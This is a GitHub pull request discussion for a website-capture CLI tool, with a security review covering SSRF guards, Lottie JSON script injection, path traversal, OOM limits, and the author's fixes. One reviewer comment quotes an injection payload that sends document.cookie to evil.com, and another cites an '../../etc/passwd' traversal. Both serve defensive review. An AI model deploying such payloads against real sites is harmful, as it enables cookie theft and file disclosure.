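export function isPublicHttpUrl(raw: string): boolean {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    return false; // not a parseable absolute URL
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;

  // URL.hostname keeps the brackets around IPv6 literals; strip them for isIP().
  const host = url.hostname.replace(/^\[|\]$/g, "").toLowerCase();
  if (host === "localhost" || host.endsWith(".localhost")) return false;

  const version = isIP(host);
  if (version === 4) {
    const parts = host.split(".").map(Number);
    const a = parts[0] ?? 0;
    const b = parts[1] ?? 0;
    if (a === 10 || a === 127 || a === 0) return false; // 0.x is an added assumption
    if (a === 172 && b >= 16 && b <= 31) return false;
    if (a === 192 && b === 168) return false;
    if (a === 169 && b === 254) return false; // includes cloud metadata endpoints
    return true;
  }
  if (version === 6) {
    if (host === "::1" || host === "::") return false; // loopback, unspecified
    if (/^f[cd]/.test(host) || /^fe[89ab]/.test(host)) return false; // unique-local, link-local
    if (host.startsWith("::ffff:")) return false; // IPv4-mapped, rejected conservatively
    return true;
  }
  return true; // a DNS name; see the caveat above
}
```

A stricter variant would also resolve the hostname and re-check the resulting addresses, and would re-validate every redirect hop.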

Comment thread packages/cli/src/capture/index.ts Outdated
`<!DOCTYPE html>
<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lottie-web/5.12.2/lottie.min.js"></script>
<style>*{margin:0;padding:0;background:transparent}#c{width:400px;height:400px}</style>
Copy link
Copy Markdown
Collaborator

JS injection via Lottie JSON interpolated into setContent. animJson is raw content fetched from the target website, directly interpolated into a <script> block via template literal (animationData:${animJson}). A crafted Lottie JSON with a nm field containing </script><script>fetch('http://evil.com/'+document.cookie)// would escape the script tag and execute arbitrary code in the Puppeteer page context.

Fix: Load the page shell first via setContent (without the data), then pass the animation data via parameterized page.evaluate() — same pattern used for the htmlExtractor fix.
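
The suggested fix could look roughly like the sketch below. `PageLike` is a hypothetical structural subset of Puppeteer's `Page` (only `setContent` and `evaluate` are used), and the `<div id="c">` container and the `loadAnimation` options are assumptions based on the `#c` style rule in the snippet above. The shell HTML is a constant, and the captured JSON reaches the page only as a serialized argument.

```typescript
// Hypothetical subset of Puppeteer's Page, so the sketch can run against a stub.
interface PageLike {
  setContent(html: string): Promise<void>;
  evaluate<A>(fn: (arg: A) => void, arg: A): Promise<unknown>;
}

// Static shell: no captured data is interpolated into this string.
const SHELL_HTML = `<!DOCTYPE html>
<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lottie-web/5.12.2/lottie.min.js"></script>
<style>*{margin:0;padding:0;background:transparent}#c{width:400px;height:400px}</style>
</head><body><div id="c"></div></body></html>`;

export async function renderLottiePreview(page: PageLike, animJson: string): Promise<void> {
  // Throws early if the fetched body is not valid JSON.
  const animationData: unknown = JSON.parse(animJson);

  await page.setContent(SHELL_HTML);

  // The argument is serialized and handed to the page as a value;
  // it is never parsed as HTML or as script source.
  await page.evaluate((data) => {
    const g = globalThis as any; // browser globals, left untyped in this sketch
    g.lottie.loadAnimation({
      container: g.document.getElementById("c"),
      renderer: "svg",
      loop: false,
      autoplay: false,
      animationData: data,
    });
  }, animationData);
}
```

With this shape, a `nm` field containing `</script>` is just a string property on the data object and cannot terminate the script element.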

let content = readFileSync(filePath);
let contentType = getMimeType(filePath);

// For composition HTML files: unwrap <template> for standalone rendering
Collaborator

Path traversal — missing guard. The fix applied to snapshot.ts (using relative() + isAbsolute()) was not applied here. A request to ../../etc/passwd would read arbitrary files. The server only listens on 127.0.0.1 on an ephemeral port, so exploitation requires local access — but the pattern is identical to what was already fixed in snapshot.ts.

Fix: Add the same guard after the join() call:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }
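
For reference, the same guard can be wrapped in a small helper so both servers share it. This is a sketch under assumptions: `resolveInside` is a hypothetical name, the caller is expected to URL-decode the request path first, and symlinks are not resolved.

```typescript
import { isAbsolute, relative, resolve, sep } from "node:path";

// Returns the resolved file path, or null when the request escapes projectDir.
export function resolveInside(projectDir: string, requestPath: string): string | null {
  // Drop leading slashes so "/index.html" resolves under projectDir,
  // not under the filesystem root.
  const filePath = resolve(projectDir, requestPath.replace(/^\/+/, ""));
  const rel = relative(projectDir, filePath);
  // ".." or "../x" means the target is outside; an absolute result means
  // a different drive on Windows.
  if (rel === ".." || rel.startsWith(".." + sep) || isAbsolute(rel)) return null;
  return filePath;
}
```

A handler would respond with 403 when the helper returns null and read the file otherwise. Comparing against `".." + sep` rather than a bare `".."` prefix avoids rejecting legitimate names that merely start with two dots.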


if (isJsonUrl || isJson) {
  const buffer = await response.buffer();
  if (buffer.length < 100 || buffer.length > 5_000_000) return; // Skip tiny or huge
Collaborator

Unbounded response body in Lottie interception. response.buffer() downloads the entire response body into memory before the size check on the next line. A site serving a multi-GB response on a .json URL would OOM before the 5MB guard runs.

Fix: Check Content-Length header first when available:

const cl = parseInt(response.headers()['content-length'] || '0', 10);
if (cl > 5_000_000) return;
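
A slightly more defensive variant of that check, as a sketch. `declaredSizeWithinLimit` is a hypothetical helper; it assumes the lower-cased header map that Puppeteer's `response.headers()` returns. Because `Content-Length` can be absent (chunked responses) or malformed, this is only a best-effort pre-filter, and the existing size check after `buffer()` would stay in place.

```typescript
const MAX_LOTTIE_BYTES = 5_000_000; // same ceiling as the post-download check

// Returns false only when the server declares a body larger than maxBytes.
// A missing or unparseable header returns true, deferring to the later check.
export function declaredSizeWithinLimit(
  headers: Record<string, string>,
  maxBytes: number = MAX_LOTTIE_BYTES,
): boolean {
  const raw = headers["content-length"];
  if (raw === undefined) return true; // e.g. chunked transfer encoding
  const declared = Number.parseInt(raw, 10);
  if (Number.isNaN(declared)) return true;
  return declared <= maxBytes;
}
```

The interception handler would return early when this yields false, before calling `response.buffer()`.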

Comment thread packages/cli/src/capture/index.ts Outdated
};

// Load .env file from repo root if it exists (for GEMINI_API_KEY, etc.)
try {
Collaborator

Manual .env parsing is fragile. This hand-rolled parser walks up 5 parent directories looking for .env and modifies process.env as a side effect. It doesn't handle multi-line values, comments after values (KEY=val # comment includes the comment), or escaped quotes. Bun has built-in .env support — if the capture command runs via npx hyperframes capture, bun loads .env automatically. If the manual parser is needed for a specific reason (e.g., output dir differs from repo root), worth documenting that.
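
If the hand-rolled parser does stay, the two single-line cases named above (trailing comments and escaped quotes) could be handled roughly as follows. This is an illustrative sketch, not the code under review: `parseEnvLine` is a hypothetical helper, and multi-line values are deliberately left out of scope.

```typescript
// Parses one line of a .env file.
// Returns null for blank lines, comment lines, and lines without KEY=.
export function parseEnvLine(line: string): [key: string, value: string] | null {
  const m = /^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$/.exec(line);
  if (!m) return null;
  const key = m[1];
  const rest = m[2];

  // Double-quoted: honor \" and \\ escapes; ignore anything after the closing quote.
  const dq = /^"((?:[^"\\]|\\.)*)"/.exec(rest);
  if (dq) return [key, dq[1].replace(/\\(["\\])/g, "$1")];

  // Single-quoted: taken literally.
  const sq = /^'([^']*)'/.exec(rest);
  if (sq) return [key, sq[1]];

  // Unquoted: a '#' at the start or after whitespace begins a comment.
  return [key, rest.replace(/(?:^|\s+)#.*$/, "").trim()];
}
```

A loader built on this would typically also avoid overwriting variables that are already set in `process.env`, so that the shell environment keeps precedence.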

Mechanical extraction, zero logic changes.

New files:
- mediaCapture.ts (345 lines): Lottie preview, video manifest/screenshots
- contentExtractor.ts (314 lines): library detection, text, Gemini, asset descriptions
- scaffolding.ts (135 lines): .env loading, project scaffold generation

Also fixes false-positive BLOCKED.md with structural Cloudflare detection.
Tested on 20 websites, pre/post output identical.
…gecss)

The --split feature auto-generates compositions from captured HTML — a
different approach from the /website-to-hyperframes skill workflow where
agents build compositions from scratch using the storyboard.

No skill file, no step reference, and no test session ever used --split.
Removes 923 lines of unused code + purgecss dependency.

Backed up to ~/Desktop/capture-split-backup/ for reference.
- assetDownloader: add isPrivateUrl() guard blocking private IP ranges
  (127.x, 10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata
  endpoints, localhost, and non-HTTP schemes
- mediaCapture: fix Lottie JSON injection by loading shell HTML first
  then passing animation data via parameterized page.evaluate()
- index.ts: check Content-Length header before response.buffer() in
  Lottie network interception to avoid OOM on multi-GB responses
Security (from miguel-heygen review):
- assetDownloader: export isPrivateUrl() SSRF guard
- htmlExtractor: add isPrivateUrl check before CSS fetch
- mediaCapture: add isPrivateUrl check before Lottie fetch
- mediaCapture: fix previewPage leak (try/finally)
- mediaCapture: skip Lottie files > 2MB for preview (CDP limit)
- contentExtractor: skip images > 4MB for Gemini captioning
- index.ts: check Content-Length before response.buffer() (OOM guard)
- snapshot.ts: register error handler before server.listen()

Capture improvements:
- Default timeout 30s to 120s (Shopify needs ~90s for Cloudflare)
- step-6-build: sub-agent dispatch template with explicit rules:
  pass file PATHS not contents, use local fonts not Google Fonts,
  verify ../assets/ references after each beat
@ularkim
Author

ularkim commented Apr 16, 2026

Review Response — Round 3

Five new commits addressing @miguel-heygen's security review + @jrusso1020's modularity concern:

Security fixes (48ec6a0, 44b9cbd)

  • SSRF protection: isPrivateUrl() guard now applied to all 3 fetch sites (assetDownloader, htmlExtractor CSS fetch, mediaCapture Lottie fetch). Blocks private IPs (127.x, 10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata endpoints, localhost, and non-HTTP schemes.
  • Lottie injection: Parameterized page.evaluate() — animation data passed as function arg, not interpolated into script tag
  • OOM guard: Content-Length check before response.buffer() in Lottie interception
  • Preview page leak: try/finally on Lottie preview rendering
  • File size guards: Skip Lottie > 2MB for preview, skip images > 4MB for Gemini captioning
  • Server error handler: Registered before listen() in snapshot.ts
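
The preview page leak fix follows the usual try/finally shape, sketched below with hypothetical `BrowserLike` and `ClosablePage` interfaces that stand in for Puppeteer's `Browser` and `Page`. The helper name `withPage` is also an assumption.

```typescript
// Hypothetical minimal interfaces standing in for Puppeteer's Browser and Page.
interface ClosablePage {
  close(): Promise<void>;
}
interface BrowserLike<P extends ClosablePage> {
  newPage(): Promise<P>;
}

// Opens a page, runs `work`, and always closes the page afterwards.
export async function withPage<P extends ClosablePage, T>(
  browser: BrowserLike<P>,
  work: (page: P) => Promise<T>,
): Promise<T> {
  const page = await browser.newPage();
  try {
    return await work(page);
  } finally {
    // Runs on success and on throw, so a failed preview render
    // does not leave an orphaned tab behind.
    await page.close();
  }
}
```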

Modularity (3b2e1cb)

Split capture/index.ts from 1,175 → 566 lines:

  • mediaCapture.ts (345 lines) — Lottie preview, video manifest
  • contentExtractor.ts (314 lines) — library detection, text, Gemini, asset descriptions
  • scaffolding.ts (135 lines) — .env loading, project scaffold

Cleanup (be0f194)

Removed --split flow entirely (splitter/, verify/, cssPurger.ts, purgecss dep) — 1,052 lines deleted. Not used by the /website-to-hyperframes skill workflow.

Other (0f3c88d, 44b9cbd)

  • Default timeout 30s → 120s (Shopify needs ~90s for Cloudflare)
  • Sub-agent dispatch instructions in step-6: pass file PATHS not contents, use local fonts not Google Fonts, verify asset refs after each beat
  • verify/index.ts typecheck fix + path traversal guard (before deletion)
  • Step-4 technique count contradiction fixed
  • Step-6 perspective tilt uses gsap.set() instead of CSS transform
  • Step-1 reordered: command first, Gemini note after

Re: adm-zip (#3 from round 1)

adm-zip was not removed — it's still in packages/cli/package.json:30. The root package.json had patchright and purgecss removed, not adm-zip.

Re: ANTHROPIC_API_KEY (#6 from round 2)

Grep confirms zero references to ANTHROPIC_API_KEY in the entire codebase. The @anthropic-ai/sdk dependency was removed earlier in this branch. Not restoring a dead env var.

CI fully green (Build, Format, Lint, Test, Runtime contract, Typecheck all pass).
Tested on 20 websites across 3 rounds.

Collaborator

@jrusso1020 jrusso1020 left a comment

looks good!

Comment on lines +9 to +13
If the built CLI isn't available, fall back to:

```bash
npx tsx packages/cli/src/cli.ts capture <URL> -o captures/<project-name>
```
Collaborator

slight nit but we probably don't need this here?

Author

Oh yeah, we don't. It was only necessary because the published package didn't have it, haha.

Critical: asset cataloger now runs BEFORE extractHtml which converts img
src to data URLs. Framer sites like heykuba.com went from 2 to 78 images.

- networkidle2 instead of networkidle0 (unblocks SPAs with WebSockets)
- Lazy-load wait: scroll to bottom, wait for img.complete
- CSS background-image cataloging for Framer/Webflow
- SVG naming: checks class, id, parent, inner text (not just aria-label)
- Gemini batch 5->20, pause 12s->2s (paid tier: 2000 RPM, ~0.001/img)
- maxOutputTokens 300->500, descriptions sorted captioned-first
- Remove tsx fallback from step-1 (reviewer nit, published CLI has it)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@ularkim
Author

ularkim commented Apr 16, 2026

Latest push (8af3814) — Capture quality fixes

Found and fixed a critical ordering bug: extractHtml converts all <img src> to data: URLs (for offline HTML export), and the asset cataloger was running AFTER it — finding only data: URLs and skipping them. Framer sites like heykuba.com went from 2 images → 78 images after moving the catalog before the mutation.

Changes

  • Catalog before DOM mutation — read-only operations (tokens, catalog, screenshots, text) now run before extractHtml which mutates the DOM
  • networkidle2 instead of networkidle0: SPAs with persistent WebSocket connections (like vibecodeapp.com) were timing out, not being blocked. networkidle2 treats navigation as finished once there are no more than 2 network connections for at least 500 ms, so a long-lived connection no longer stalls the capture
  • Lazy-load image wait — after scrolling, waits for all img.complete before proceeding (Framer IntersectionObserver support)
  • CSS background-image cataloging — scans getComputedStyle(el).backgroundImage on divs for Framer/Webflow sites
  • SVG naming — checks class, id, parent class, inner <text> before falling back to icon-N.svg. NeetCode roadmap is now ngx-graph.svg, FontAwesome icons are fa-twitter.svg, fa-youtube.svg
  • Gemini batching — batch 5→20, pause 12s→2s (paid tier handles 2000 RPM). 78-image site now captions in ~10s instead of 3 min
  • maxOutputTokens 300→500 — descriptions were being truncated mid-sentence
  • Asset descriptions sorted — Gemini-captioned images listed first (richest descriptions), then uncaptioned, then SVGs, then fonts
  • Removed tsx fallback from step-1 per @jrusso1020's nit
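
The batching change can be pictured with the sketch below. It assumes that requests within a batch run concurrently and that the pause applies only between batches; `mapInBatches` is a hypothetical helper, not the captioning code itself. Under those assumptions, 78 images at batch size 5 means 16 batches and 15 pauses of 12 s (180 s of waiting), while batch size 20 means 4 batches and 3 pauses of 2 s (6 s of waiting), which is consistent with the timings quoted above.

```typescript
// Runs `fn` over `items` in concurrent batches, pausing between batches.
// Results are returned in input order.
export async function mapInBatches<T, R>(
  items: T[],
  batchSize: number,
  pauseMs: number,
  fn: (item: T) => Promise<R>,
): Promise<R[]> {
  const out: R[] = [];
  for (let i = 0; i < items.length; i += batchSize) {
    const batch = items.slice(i, i + batchSize);
    // Promise.all preserves the order of the batch.
    out.push(...(await Promise.all(batch.map(fn))));
    // No pause after the final batch.
    if (i + batchSize < items.length) {
      await new Promise((resolve) => setTimeout(resolve, pauseMs));
    }
  }
  return out;
}
```

A call such as `mapInBatches(images, 20, 2000, captionImage)` would correspond to the new settings, where `captionImage` stands for whatever function sends one image to the captioning API.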

Tested on neetcode.io (26 images cataloged, SVGs named correctly), heykuba.com (2→78 images), vibecodeapp.com (was timing out, now captures in ~15s).

@jrusso1020 jrusso1020 merged commit 87f4c77 into main Apr 16, 2026
20 checks passed
@jrusso1020 jrusso1020 deleted the feat/website-capture-design-md branch April 16, 2026 19:03

5 participants